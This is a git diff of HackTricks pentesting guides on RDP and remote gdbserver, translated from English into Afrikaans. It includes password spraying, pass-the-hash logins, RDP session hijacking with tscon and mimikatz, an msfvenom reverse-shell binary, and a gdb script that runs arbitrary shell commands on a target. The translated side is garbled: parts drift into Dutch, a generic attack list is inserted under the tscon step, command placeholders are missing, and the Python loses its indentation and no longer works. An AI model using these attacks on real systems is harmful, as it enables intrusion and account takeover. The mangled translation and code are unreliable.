-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
 
 

 
 

 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik werkstrome te bou en outomatiseer met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\
+Kry vandag toegang:
 
 {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
diff --git a/network-services-pentesting/pentesting-rdp.md b/network-services-pentesting/pentesting-rdp.md
index 26ed13ba7..bd7988d5d 100644
--- a/network-services-pentesting/pentesting-rdp.md
+++ b/network-services-pentesting/pentesting-rdp.md
@@ -2,38 +2,36 @@
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
 
 

 
 

 
-**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
+**Onmiddellik beskikbare opset vir kwetsbaarheidsassessering en penetrasietoetsing**. Voer 'n volledige pentest uit van enige plek met 20+ gereedskap en funksies wat strek van rekognisering tot verslagdoening. Ons vervang nie pentesters nie - ons ontwikkel aangepaste gereedskap, opsporings- en uitbuitingsmodules om hulle 'n bietjie tyd te gee om dieper te graaf, skulpe te kraak en pret te hê.
 
 {% embed url="https://pentest-tools.com/" %}
 
-## Basic Information
+## Basiese Inligting
 
-Developed by Microsoft, the **Remote Desktop Protocol** (**RDP**) is designed to enable a graphical interface connection between computers over a network. To establish such a connection, **RDP** client software is utilized by the user, and concurrently, the remote computer is required to operate **RDP** server software. This setup allows for the seamless control and access of a distant computer's desktop environment, essentially bringing its interface to the user's local device.
-
-**Default port:** 3389
+Ontwikkel deur Microsoft, is die **Remote Desktop Protocol** (**RDP**) ontwerp om 'n grafiese interfeesverbinding tussen rekenaars oor 'n netwerk moontlik te maak. Om so 'n verbinding tot stand te bring, word **RDP**-kliënt sagteware deur die gebruiker gebruik, en terselfdertyd moet die afgeleë rekenaar **RDP**-bediener sagteware bedryf. Hierdie opset maak dit moontlik om naadloos beheer en toegang tot die lessenaar-omgewing van 'n verre rekenaar te verkry, waardeur die gebruiker se plaaslike toestel die lessenaar-omgewing kan sien.
 
+**Verstekpoort:** 3389
 ```
 PORT     STATE SERVICE
 3389/tcp open  ms-wbt-server
 ```
+## Opname
 
-## Enumeration
-
-### Automatic
+### Outomaties
 
 {% code overflow="wrap" %}
 ```bash
@@ -41,151 +39,170 @@ nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 338
 ```
 {% endcode %}
 
-It checks the available encryption and DoS vulnerability (without causing DoS to the service) and obtains NTLM Windows info (versions).
+Dit kontroleer die beskikbare enkripsie en DoS kwesbaarheid (sonder om DoS na die diens te veroorsaak) en verkry NTLM Windows-inligting (weergawes).
 
 ### [Brute force](../generic-methodologies-and-resources/brute-force.md#rdp)
 
-**Be careful, you could lock accounts**
+**Wees versigtig, jy kan rekeninge sluit**
 
-### **Password Spraying**
-
-**Be careful, you could lock accounts**
+### **Wagwoord Spuit**
 
+**Wees versigtig, jy kan rekeninge sluit**
 ```bash
 # https://github.com/galkan/crowbar
 crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'
 # hydra
 hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp
 ```
+### Verbind met bekende geloofsbriewe/hash
 
-### Connect with known credentials/hash
+Om verbinding te maken met een Remote Desktop Protocol (RDP) server, kan je proberen om bekende geloofsbriewe of een hash te gebruiken. Dit kan handig zijn als je toegang wilt krijgen tot een RDP-server waarvan je de geloofsbriewe al kent of waarvan je de hash hebt verkregen.
 
+#### Gebruik van bekende geloofsbriewe
+
+Als je de gebruikersnaam en het wachtwoord kent van een geldige gebruiker op de RDP-server, kan je deze informatie gebruiken om verbinding te maken. Gebruik de volgende opdracht om verbinding te maken met de server:
+
+```bash
+xfreerdp /u: /p: /v:
+```
+
+Vervang `` door de geldige gebruikersnaam, `` door het bijbehorende wachtwoord en `` door het IP-adres van de RDP-server.
+
+#### Gebruik van een hash
+
+Als je een hash hebt verkregen van de geloofsbriewe van een geldige gebruiker, kan je deze hash gebruiken om verbinding te maken. Gebruik de volgende opdracht om verbinding te maken met de server:
+
+```bash
+xfreerdp /u: /pth: /v:
+```
+
+Vervang `` door de geldige gebruikersnaam en `` door de verkregen NTLM-hash. `` moet worden vervangen door het IP-adres van de RDP-server.
+
+Opmerking: Het gebruik van een hash om verbinding te maken met een RDP-server kan handig zijn als je de geloofsbriewe niet in platte tekst hebt, maar alleen de hash ervan.
 ```bash
 rdesktop -u  
 rdesktop -d  -u  -p  
 xfreerdp [/d:domain] /u: /p: /v:
 xfreerdp [/d:domain] /u: /pth: /v: #Pass the hash
 ```
+### Kontroleer bekende geloofsbriewe teen RDP-dienste
 
-### Check known credentials against RDP services
-
-rdp\_check.py from impacket let you check if some credentials are valid for a RDP service:
-
+rdp\_check.py van impacket stel jou in staat om te kontroleer of sekere geloofsbriewe geldig is vir 'n RDP-diens:
 ```bash
 rdp_check /:@
 ```
-
-
-
 

 
-**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
+**Onmiddellik beskikbare opset vir kwesbaarheidsassessering en penetrasietoetsing**. Voer 'n volledige penetrasietoets uit van enige plek met 20+ gereedskap en funksies wat strek van verkenningswerk tot verslagdoening. Ons vervang nie penetrasietoetsers nie - ons ontwikkel aangepaste gereedskap, opsporings- en uitbuitingsmodules om hulle 'n bietjie tyd te gee om dieper te graaf, skulpe te laat spat en pret te hê.
 
 {% embed url="https://pentest-tools.com/" %}
 
-## **Attacks**
+## **Aanvalle**
 
-### Session stealing
+### Sessiediefstal
 
-With **SYSTEM permissions** you can access any **opened RDP session by any user** without need to know the password of the owner.
-
-**Get openned sessions:**
+Met **SYSTEM-toestemmings** kan jy toegang verkry tot enige **geopen RDP-sessie deur enige gebruiker** sonder om die wagwoord van die eienaar te weet.
 
+**Kry geopen sessies:**
 ```
 query user
 ```
+**Toegang tot die gekose sessie**
 
-**Access to the selected session**
+Om toegang te verkry tot die gekose sessie, kan jy die volgende stappe volg:
 
+1. Identifiseer die RDP-diens wat jy wil penetreer.
+2. Voer 'n skandering uit om die RDP-poort (gewoonlik poort 3389) te vind wat oop is vir kommunikasie.
+3. Maak 'n RDP-verbinding met die IP-adres van die doelwitmasjien deur gebruik te maak van 'n RDP-kliënt.
+4. As jy 'n geldige gebruikersnaam en wagwoord het, kan jy dit gebruik om aan te meld by die RDP-sessie.
+5. As jy nie geldige aanmeldingsbesonderhede het nie, kan jy probeer om 'n aanval uit te voer om toegang te verkry. Hier is 'n paar moontlike aanvalstegnieke:
+   - Brute force-aanval: Probeer om verskillende kombinasies van gebruikersname en wagwoorde te gebruik totdat jy suksesvol aanmeld.
+   - Woordeboekaanval: Gebruik 'n woordeboek van algemene wagwoorde om te probeer om aan te meld.
+   - Pass-the-Hash-aanval: As jy toegang het tot 'n geldige gebruikershash, kan jy dit gebruik om aan te meld sonder om die wagwoord te ken.
+   - Man-in-the-Middle-aanval: Probeer om die RDP-verkeer te onderskep en te manipuleer om toegang te verkry.
+6. As jy suksesvol toegang verkry het tot die RDP-sessie, kan jy die sessie gebruik om verdere verkennings- en aanvalstegnieke uit te voer.
 ```bash
 tscon  /dest:
 ```
+Nou sal jy binne die gekose RDP-sessie wees en jy sal 'n gebruiker moet voorstel deur slegs Windows-gereedskap en funksies te gebruik.
 
-Now you will be inside the selected RDP session and you will have impersonate a user using only Windows tools and features.
+**Belangrik**: Wanneer jy toegang verkry tot 'n aktiewe RDP-sessie, sal jy die gebruiker wat dit gebruik het, aftrap.
 
-**Important**: When you access an active RDP sessions you will kickoff the user that was using it.
-
-You could get passwords from the process dumping it, but this method is much faster and led you interact with the virtual desktops of the user (passwords in notepad without been saved in disk, other RDP sessions opened in other machines...)
+Jy kan wagwoorde kry deur dit uit die proses te dump, maar hierdie metode is baie vinniger en stel jou in staat om met die virtuele blad van die gebruiker te werk (wagwoorde in notepad sonder om op die skyf gestoor te word, ander RDP-sessies wat op ander masjiene oopgemaak is...)
 
 #### **Mimikatz**
 
-You could also use mimikatz to do this:
-
+Jy kan ook mimikatz gebruik om dit te doen:
 ```bash
 ts::sessions        #Get sessions
 ts::remote /id:2    #Connect to the session
 ```
+### Plakkerige sleutels & Utilman
 
-### Sticky-keys & Utilman
+Deur deze tegniek te kombineer met **plakkerige sleutels** of **utilman sal jy in staat wees om enige tyd toegang te verkry tot 'n administratiewe CMD en enige RDP-sessie**
 
-Combining this technique with **stickykeys** or **utilman you will be able to access a administrative CMD and any RDP session anytime**
+Jy kan soek na RDP's wat reeds met een van hierdie tegnieke agterdeur is met: [https://github.com/linuz/Sticky-Keys-Slayer](https://github.com/linuz/Sticky-Keys-Slayer)
 
-You can search RDPs that have been backdoored with one of these techniques already with: [https://github.com/linuz/Sticky-Keys-Slayer](https://github.com/linuz/Sticky-Keys-Slayer)
+### RDP-prosesinjeksie
 
-### RDP Process Injection
-
-If someone from a different domain or with **better privileges login via RDP** to the PC where **you are an Admin**, you can **inject** your beacon in his **RDP session process** and act as him:
+As iemand van 'n ander domein of met **betere voorregte inlog via RDP** na die rekenaar waar **jy 'n Admin is**, kan jy jou sein in sy **RDP-sessieproses** inspuit en as hom optree:
 
 {% content-ref url="../windows-hardening/active-directory-methodology/rdp-sessions-abuse.md" %}
 [rdp-sessions-abuse.md](../windows-hardening/active-directory-methodology/rdp-sessions-abuse.md)
 {% endcontent-ref %}
 
-### Adding User to RDP group
-
+### Gebruiker byvoeg tot RDP-groep
 ```bash
 net localgroup "Remote Desktop Users" UserLoginName /add
 ```
-
-## Automatic Tools
+## Outomatiese Gereedskap
 
 * [**AutoRDPwn**](https://github.com/JoelGMSec/AutoRDPwn)
 
-**AutoRDPwn** is a post-exploitation framework created in Powershell, designed primarily to automate the **Shadow** attack on Microsoft Windows computers. This vulnerability (listed as a feature by Microsoft) allows a remote attacker to **view his victim's desktop without his consent**, and even control it on demand, using tools native to the operating system itself.
+**AutoRDPwn** is 'n post-exploitation raamwerk wat in Powershell geskep is en hoofsaaklik ontwerp is om die **Shadow**-aanval op Microsoft Windows-rekenaars outomaties te outomatiseer. Hierdie kwesbaarheid (deur Microsoft as 'n funksie gelys) stel 'n afgeleë aanvaller in staat om **sy slagoffer se lessenaar sonder sy toestemming te sien**, en selfs op aanvraag te beheer, deur gebruik te maak van hulpmiddels wat inherent is aan die bedryfstelsel self.
 
 * [**EvilRDP**](https://github.com/skelsec/evilrdp)
-  * Control mouse and keyboard in an automated way from command line
-  * Control clipboard in an automated way from command line
-  * Spawn a SOCKS proxy from the client that channels network communication to the target via RDP
-  * Execute arbitrary SHELL and PowerShell commands on the target without uploading files
-  * Upload and download files to/from the target even when file transfers are disabled on the target
-
-## HackTricks Automatic Commands
+* Beheer muis en sleutelbord outomaties vanaf die opdraglyn
+* Beheer knipbord outomaties vanaf die opdraglyn
+* Skep 'n SOCKS-proksi vanaf die kliënt wat netwerk kommunikasie na die teiken deur RDP kanaliseer
+* Voer willekeurige SHELL- en PowerShell-opdragte op die teiken uit sonder om lêers op te laai
+* Laai lêers op en aflaai vanaf die teiken, selfs as lêeroordragte op die teiken gedeaktiveer is
 
+## HackTricks Outomatiese Opdragte
 ```
 Protocol_Name: RDP    #Protocol Abbreviation if there is one.
 Port_Number:  3389     #Comma separated if there is more than one.
 Protocol_Description: Remote Desktop Protocol         #Protocol Abbreviation Spelled out
 
 Entry_1:
-  Name: Notes
-  Description: Notes for RDP
-  Note: |
-    Developed by Microsoft, the Remote Desktop Protocol (RDP) is designed to enable a graphical interface connection between computers over a network. To establish such a connection, RDP client software is utilized by the user, and concurrently, the remote computer is required to operate RDP server software. This setup allows for the seamless control and access of a distant computer's desktop environment, essentially bringing its interface to the user's local device. 
+Name: Notes
+Description: Notes for RDP
+Note: |
+Developed by Microsoft, the Remote Desktop Protocol (RDP) is designed to enable a graphical interface connection between computers over a network. To establish such a connection, RDP client software is utilized by the user, and concurrently, the remote computer is required to operate RDP server software. This setup allows for the seamless control and access of a distant computer's desktop environment, essentially bringing its interface to the user's local device.
 
-    https://book.hacktricks.xyz/pentesting/pentesting-rdp
+https://book.hacktricks.xyz/pentesting/pentesting-rdp
 
 Entry_2:
-  Name: Nmap
-  Description: Nmap with RDP Scripts
-  Command: nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 {IP}
+Name: Nmap
+Description: Nmap with RDP Scripts
+Command: nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 {IP}
 ```
-
 

 
-**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
+**Onmiddellik beskikbare opset vir kwesbaarheidsbeoordeling en penetrasietoetsing**. Voer 'n volledige penetrasietoets uit van enige plek met 20+ gereedskap en funksies wat strek van verkenningswerk tot verslagdoening. Ons vervang nie penetrasietoetsers nie - ons ontwikkel aangepaste gereedskap, opsporings- en uitbuitingsmodules om hulle tyd te gee om dieper te graaf, skulpe te kraak en pret te hê.
 
 {% embed url="https://pentest-tools.com/" %}
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
 
 

diff --git a/network-services-pentesting/pentesting-remote-gdbserver.md b/network-services-pentesting/pentesting-remote-gdbserver.md
index c30239954..11a5b74fa 100644
--- a/network-services-pentesting/pentesting-remote-gdbserver.md
+++ b/network-services-pentesting/pentesting-remote-gdbserver.md
@@ -2,36 +2,35 @@
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
 
 

 
 

 
-**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
+**Onmiddellik beskikbare opset vir kwetsbaarheidsassessering en penetrasietoetsing**. Voer 'n volledige pentest uit van enige plek met 20+ gereedskap en funksies wat strek van rekognisering tot verslagdoening. Ons vervang nie pentesters nie - ons ontwikkel aangepaste gereedskap, opsporings- en uitbuitingsmodules om hulle 'n bietjie tyd te gee om dieper te graaf, skulpe te kraak en pret te hê.
 
 {% embed url="https://pentest-tools.com/" %}
 
-## **Basic Information**
+## **Basiese Inligting**
 
-**gdbserver** is a tool that enables the debugging of programs remotely. It runs alongside the program that needs debugging on the same system, known as the "target." This setup allows the **GNU Debugger** to connect from a different machine, the "host," where the source code and a binary copy of the debugged program are stored. The connection between **gdbserver** and the debugger can be made over TCP or a serial line, allowing for versatile debugging setups.
+**gdbserver** is 'n hulpmiddel wat die afstandsondersteuning van programme moontlik maak. Dit loop saam met die program wat foutopsporing benodig op dieselfde stelsel, bekend as die "teiken." Hierdie opset maak dit vir die **GNU Debugger** moontlik om vanaf 'n ander masjien, die "gasheer," waar die bronkode en 'n binêre kopie van die foutopgespoorde program gestoor word, te verbind. Die verbinding tussen **gdbserver** en die foutopspoorprogram kan oor TCP of 'n seriële lyn gemaak word, wat veelsydige foutopsporingsopsette moontlik maak.
 
-You can make a **gdbserver listen in any port** and at the moment **nmap is not capable of recognising the service**.
+Jy kan 'n **gdbserver laat luister op enige poort** en op hierdie oomblik **is nmap nie in staat om die diens te herken nie**.
 
-## Exploitation
+## Uitbuiting
 
-### Upload and Execute
-
-You can easily create an **elf backdoor with msfvenom**, upload it and execute is:
+### Oplaai en Uitvoer
 
+Jy kan maklik 'n **elf agterdeur met msfvenom** skep, dit oplaai en uitvoer:
 ```bash
 # Trick shared by @B1n4rySh4d0w
 msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 PrependFork=true -f elf -o binary.elf
@@ -54,11 +53,9 @@ run
 
 # You should get your reverse-shell
 ```
+### Voer willekeurige opdragte uit
 
-### Execute arbitrary commands
-
-There is another way to **make the debugger execute arbitrary commands via a [python custom script taken from here](https://stackoverflow.com/questions/26757055/gdbserver-execute-shell-commands-of-the-target)**.
-
+Daar is 'n ander manier om die aflynontleder willekeurige opdragte te laat uitvoer deur middel van 'n [python-aangepaste skrip wat hier vandaan geneem is](https://stackoverflow.com/questions/26757055/gdbserver-execute-shell-commands-of-the-target).
 ```bash
 # Given remote terminal running `gdbserver :2345 ./remote_executable`, we connect to that server.
 target extended-remote 192.168.1.4:2345
@@ -77,8 +74,7 @@ r
 # Run the remote command, e.g. `ls`.
 rcmd ls
 ```
-
-First of all **create locally this script**:
+Eerst en voorsit **skep plaaslik hierdie skrip**:
 
 {% code title="remote-cmd.py" %}
 ```python
@@ -91,108 +87,108 @@ import uuid
 
 
 class RemoteCmd(gdb.Command):
-    def __init__(self):
-        self.addresses = {}
+def __init__(self):
+self.addresses = {}
 
-        self.tmp_file = f'/tmp/{uuid.uuid4().hex}'
-        gdb.write(f"Using tmp output file: {self.tmp_file}.\n")
+self.tmp_file = f'/tmp/{uuid.uuid4().hex}'
+gdb.write(f"Using tmp output file: {self.tmp_file}.\n")
 
-        gdb.execute("set detach-on-fork off")
-        gdb.execute("set follow-fork-mode parent")
+gdb.execute("set detach-on-fork off")
+gdb.execute("set follow-fork-mode parent")
 
-        gdb.execute("set max-value-size unlimited")
-        gdb.execute("set pagination off")
-        gdb.execute("set print elements 0")
-        gdb.execute("set print repeats 0")
+gdb.execute("set max-value-size unlimited")
+gdb.execute("set pagination off")
+gdb.execute("set print elements 0")
+gdb.execute("set print repeats 0")
 
-        super(RemoteCmd, self).__init__("rcmd", gdb.COMMAND_USER)
+super(RemoteCmd, self).__init__("rcmd", gdb.COMMAND_USER)
 
-    def preload(self):
-        for symbol in [
-            "close",
-            "execl",
-            "fork",
-            "free",
-            "lseek",
-            "malloc",
-            "open",
-            "read",
-        ]:
-            self.load(symbol)
+def preload(self):
+for symbol in [
+"close",
+"execl",
+"fork",
+"free",
+"lseek",
+"malloc",
+"open",
+"read",
+]:
+self.load(symbol)
 
-    def load(self, symbol):
-        if symbol not in self.addresses:
-            address_string = gdb.execute(f"info address {symbol}", to_string=True)
-            match = re.match(
-                f'Symbol "{symbol}" is at ([0-9a-fx]+) .*', address_string, re.IGNORECASE
-            )
-            if match and len(match.groups()) > 0:
-                self.addresses[symbol] = match.groups()[0]
-            else:
-                raise RuntimeError(f'Could not retrieve address for symbol "{symbol}".')
+def load(self, symbol):
+if symbol not in self.addresses:
+address_string = gdb.execute(f"info address {symbol}", to_string=True)
+match = re.match(
+f'Symbol "{symbol}" is at ([0-9a-fx]+) .*', address_string, re.IGNORECASE
+)
+if match and len(match.groups()) > 0:
+self.addresses[symbol] = match.groups()[0]
+else:
+raise RuntimeError(f'Could not retrieve address for symbol "{symbol}".')
 
-        return self.addresses[symbol]
+return self.addresses[symbol]
 
-    def output(self):
-        # From `fcntl-linux.h`
-        O_RDONLY = 0
-        gdb.execute(
-            f'set $fd = (int){self.load("open")}("{self.tmp_file}", {O_RDONLY})'
-        )
+def output(self):
+# From `fcntl-linux.h`
+O_RDONLY = 0
+gdb.execute(
+f'set $fd = (int){self.load("open")}("{self.tmp_file}", {O_RDONLY})'
+)
 
-        # From `stdio.h`
-        SEEK_SET = 0
-        SEEK_END = 2
-        gdb.execute(f'set $len = (int){self.load("lseek")}($fd, 0, {SEEK_END})')
-        gdb.execute(f'call (int){self.load("lseek")}($fd, 0, {SEEK_SET})')
-        if int(gdb.convenience_variable("len")) <= 0:
-            gdb.write("No output was captured.")
-            return
+# From `stdio.h`
+SEEK_SET = 0
+SEEK_END = 2
+gdb.execute(f'set $len = (int){self.load("lseek")}($fd, 0, {SEEK_END})')
+gdb.execute(f'call (int){self.load("lseek")}($fd, 0, {SEEK_SET})')
+if int(gdb.convenience_variable("len")) <= 0:
+gdb.write("No output was captured.")
+return
 
-        gdb.execute(f'set $mem = (void*){self.load("malloc")}($len)')
-        gdb.execute(f'call (int){self.load("read")}($fd, $mem, $len)')
-        gdb.execute('printf "%s\\n", (char*) $mem')
+gdb.execute(f'set $mem = (void*){self.load("malloc")}($len)')
+gdb.execute(f'call (int){self.load("read")}($fd, $mem, $len)')
+gdb.execute('printf "%s\\n", (char*) $mem')
 
-        gdb.execute(f'call (int){self.load("close")}($fd)')
-        gdb.execute(f'call (int){self.load("free")}($mem)')
+gdb.execute(f'call (int){self.load("close")}($fd)')
+gdb.execute(f'call (int){self.load("free")}($mem)')
 
-    def invoke(self, arg, from_tty):
-        try:
-            self.preload()
+def invoke(self, arg, from_tty):
+try:
+self.preload()
 
-            is_auto_solib_add = gdb.parameter("auto-solib-add")
-            gdb.execute("set auto-solib-add off")
+is_auto_solib_add = gdb.parameter("auto-solib-add")
+gdb.execute("set auto-solib-add off")
 
-            parent_inferior = gdb.selected_inferior()
-            gdb.execute(f'set $child_pid = (int){self.load("fork")}()')
-            child_pid = gdb.convenience_variable("child_pid")
-            child_inferior = list(
-                filter(lambda x: x.pid == child_pid, gdb.inferiors())
-            )[0]
-            gdb.execute(f"inferior {child_inferior.num}")
+parent_inferior = gdb.selected_inferior()
+gdb.execute(f'set $child_pid = (int){self.load("fork")}()')
+child_pid = gdb.convenience_variable("child_pid")
+child_inferior = list(
+filter(lambda x: x.pid == child_pid, gdb.inferiors())
+)[0]
+gdb.execute(f"inferior {child_inferior.num}")
 
-            try:
-                gdb.execute(
-                    f'call (int){self.load("execl")}("/bin/sh", "sh", "-c", "exec {arg} >{self.tmp_file} 2>&1", (char*)0)'
-                )
-            except gdb.error as e:
-                if (
-                    "The program being debugged exited while in a function called from GDB"
-                    in str(e)
-                ):
-                    pass
-                else:
-                    raise e
-            finally:
-                gdb.execute(f"inferior {parent_inferior.num}")
-                gdb.execute(f"remove-inferiors {child_inferior.num}")
+try:
+gdb.execute(
+f'call (int){self.load("execl")}("/bin/sh", "sh", "-c", "exec {arg} >{self.tmp_file} 2>&1", (char*)0)'
+)
+except gdb.error as e:
+if (
+"The program being debugged exited while in a function called from GDB"
+in str(e)
+):
+pass
+else:
+raise e
+finally:
+gdb.execute(f"inferior {parent_inferior.num}")
+gdb.execute(f"remove-inferiors {child_inferior.num}")
 
-            self.output()
-        except Exception as e:
-            gdb.write("".join(traceback.TracebackException.from_exception(e).format()))
-            raise e
-        finally:
-            gdb.execute(f'set auto-solib-add {"on" if is_auto_solib_add else "off"}')
+self.output()
+except Exception as e:
+gdb.write("".join(traceback.TracebackException.from_exception(e).format()))
+raise e
+finally:
+gdb.execute(f'set auto-solib-add {"on" if is_auto_solib_add else "off"}')
 
 
 RemoteCmd()
@@ -201,20 +197,20 @@ RemoteCmd()
 
 

 
